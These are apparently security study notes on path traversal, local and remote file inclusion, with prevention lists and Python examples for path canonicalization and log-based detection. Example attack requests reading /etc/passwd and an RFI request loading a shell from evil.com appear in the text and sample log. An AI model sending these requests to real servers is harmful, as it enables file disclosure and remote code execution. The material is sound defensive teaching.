Path Traversal
Path Traversal is a vulnerability that allows an attacker to access files and directories outside the directory a web application intends to expose.
It is done by manipulating a file path supplied as input so that it points at sensitive files on the server.
Files reached this way can include application code and data, credentials for backend systems, and sensitive operating system files.
Example:
/etc/passwd, the file holding user account information (reached through a path such as ../../etc/passwd)
Original Request || GET /viewfile?file=example.txt
Modified Request || GET /viewfile?file=../../etc/passwd
Impact:
- Sensitive Information Disclosure
Preventing Path Traversal vulnerabilities:
- Avoid relying on user input when constructing file paths.
- Ensure user input is sanitized and validated.
- Canonicalization, i.e. normalize the path (resolve any .. segments and other special characters) and then check that the result still lies inside the intended directory, so the input cannot break out of the intended directory structure.
- Restrict file permissions so that users and the web application have access only to the files and directories they need.
- Continuously monitor and log access requests so that abnormal file/directory access requests can be detected.
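The canonicalization check from the list above, written out as an added Python example (it is not code from the original notes). It assumes a hypothetical base directory /var/www/app/public/files for the /viewfile endpoint and shows the unsafe concatenation behind the modified request next to a resolver that decodes, normalizes and then confirms the result is still under the base directory.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Assumed directory the /viewfile endpoint is meant to serve from (hypothetical path).
BASE_DIR = os.path.realpath("/var/www/app/public/files")


def vulnerable_resolve(user_path: str) -> str:
    """The pattern behind 'GET /viewfile?file=../../etc/passwd': the client value
    is glued onto the base directory, so '..' segments walk out of it, and an
    absolute value makes os.path.join drop the base directory entirely."""
    return os.path.join(BASE_DIR, user_path)


def safe_resolve(user_path: str) -> Optional[str]:
    """Canonicalize, then confine: return an absolute path only if it still lies
    inside BASE_DIR; return None for anything that breaks out."""
    # Decode percent-encoding first so %2e%2e%2f is normalized the same way as ../
    decoded = unquote(user_path)
    # NUL bytes can truncate the path in lower layers; refuse them outright.
    if "\x00" in decoded:
        return None
    # The client must never supply an absolute path.
    if os.path.isabs(decoded):
        return None
    # realpath resolves '.', '..' and symlinks into one canonical form.
    candidate = os.path.realpath(os.path.join(BASE_DIR, decoded))
    # commonpath compares whole components, so '/base-other' is not mistaken for
    # a child of '/base' the way a plain startswith() check would be.
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate


def escapes_base(path: str) -> bool:
    """True if a path, once canonicalized, ends up outside BASE_DIR (used to
    show what the vulnerable resolver hands to the file system)."""
    resolved = os.path.realpath(path)
    return os.path.commonpath([BASE_DIR, resolved]) != BASE_DIR


if __name__ == "__main__":
    for value in ("example.txt", "../../etc/passwd", "..%2F..%2Fetc%2Fpasswd", "/etc/passwd"):
        print(f"{value!r:28} vulnerable -> {vulnerable_resolve(value)}")
        print(f"{'':28} safe       -> {safe_resolve(value)}")
```

Only the return value of safe_resolve should ever reach open(); the check is on the canonical path, not on the raw string, so encodings and odd spellings of ".." are handled uniformly.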
****************************************************************************
LFI i.e. Local File Inclusion
LFI is a vulnerability that occurs when a web application lets user input (such as URL parameters, form fields, or cookies) decide which file is loaded from the local server's file system, without proper validation or sanitization.
This lets an attacker include files that were never meant to be exposed.
Intended Request
http://example.com/index.php?page=home || Loads home.php
Malicious Request
http://example.com/index.php?page=../../../etc/passwd || Loads sensitive system file /etc/passwd
https://example.com/?file=abc.php changed to https://example.com/?file=../../conn.php || conn.php is included and executed, exposing the database connection details
Impact:
- Sensitive Information Disclosure
- Log Poisoning (injection of malicious code into log file) leading to Remote Code Execution
Analogy:
Breaking into a house and searching through its drawers (accessing local files of the victim).
****************************************************************************
RFI i.e. Remote File Inclusion
RFI is a vulnerability that happens when an application allows user input to specify a file to include, and it can load files from an external (remote) server controlled by the attacker.
This often leads to direct execution of malicious code.
In languages like PHP, if the configuration options allow_url_fopen and allow_url_include are enabled, functions like include() or require() can load files from remote URLs.
http://example.com/index.php?page=http://evil.com/shell.txt
The server fetches shell.txt from the attacker's host and executes its contents.
https://example.com/?file=abc.php changed to http://example.com/?file=https://www.x.com/y.php || y.php is fetched from the remote host and executed
Impact:
- Remote Code Execution, usually leading to full server compromise.
Analogy:
Forcing the house to download and run your own malware (loading remote files).
****************************************************************************
Difference between LFI and RFI:
- File Source
LFI — Local Server. RFI — Remote Server
- Goal
LFI — Information Disclosure. RFI — Execution of malicious code
- Dependency
LFI — Does not depend on special server settings; works if the server code includes user input in file inclusion functions.
RFI — Depends on server settings that allow inclusion of remote URLs. If these settings are disabled, the vulnerability cannot be exploited to include remote files.
****************************************************************************
One-line difference
LFI means inclusion and execution of local server files through user input.
RFI means inclusion and execution of remote files (controlled by the attacker) through user input, and it additionally depends on server configuration.
****************************************************************************
LFI Prevention:
- Whitelist allowed files only.
- Keep user uploads separate from executable directories.
- Monitor for LFI attempts: unusual requests and path traversal patterns in request logs.
RFI Prevention:
- Same as LFI, plus disable remote URL inclusion (in PHP, keep allow_url_include off).
- Keep user uploads separate; never execute remote content.
- Monitor outbound connections for unusual fetches.
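An added Python example (not code from the original notes) covering two of the bullets above for both LFI and RFI: the allowlist that makes the page parameter a lookup key rather than a path, and a monitor that scans access-log lines for traversal patterns and for parameter values that would make the server fetch a remote URL. The log lines, page table and client addresses are constructed for the example; a real deployment would read its own server log.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlparse

# Allowlist for index.php?page=...: the parameter is a key into this table, never a
# path, so '../' or 'http://' in the value can only miss the table (constructed entries).
ALLOWED_PAGES = {
    "home": "home.php",
    "about": "about.php",
    "contact": "contact.php",
}


def resolve_page(page_param: str) -> Optional[str]:
    """Return the file to include for a ?page= value, or None if it is not allowlisted."""
    return ALLOWED_PAGES.get(page_param)


# Detection side: what the monitor looks for in each decoded query-string value.
TRAVERSAL = re.compile(r"\.\.[/\\]")
REMOTE_URL = re.compile(r"^https?://", re.IGNORECASE)

# Common-log-format prefix: client, identd, user, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log; clients are documentation addresses, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /viewfile?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=http://evil.com/shell.txt HTTP/1.1" 200 77
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 498
"""


def classify_target(target: str) -> Optional[str]:
    """Label one request target as 'traversal', 'remote_include' or None."""
    query = urlparse(target).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            # parse_qs decoded once; decode again so a double-encoded '..%252F' is also seen.
            value = unquote(value)
            if TRAVERSAL.search(value):
                return "traversal"
            if REMOTE_URL.match(value):
                return "remote_include"
    return None


def scan_log(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line_number, client, label, target) for every suspicious request."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = LOG_LINE.match(line)
        if not match:
            continue  # unparseable line; a real monitor would count these separately
        label = classify_target(match.group("target"))
        if label:
            findings.append((number, match.group("client"), label, match.group("target")))
    return findings


if __name__ == "__main__":
    for page in ("home", "../../../etc/passwd", "http://evil.com/shell.txt"):
        print(f"page={page!r:30} -> {resolve_page(page)}")
    for number, client, label, target in scan_log(SAMPLE_LOG):
        print(f"line {number}: {client} {label:15} {target}")
```

The remote_include label flags the inbound request that would cause an outbound fetch; watching the outbound connections themselves, as the last RFI bullet suggests, is a network-level control that complements this log check rather than replacing it.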
****************************************************************************
To summarise:
- Path Traversal: Exploiting input to access and read local files on the server.
- LFI: Exploiting input to include and execute local files on the server.
- File Upload: Malicious files being uploaded to the server with the intent of taking control of it. The attacker uploads the file directly.
- RFI: Forcing the server to fetch and execute files from a remote server. The attacker does not upload anything; the crafted request makes the server fetch the file.
****************************************************************************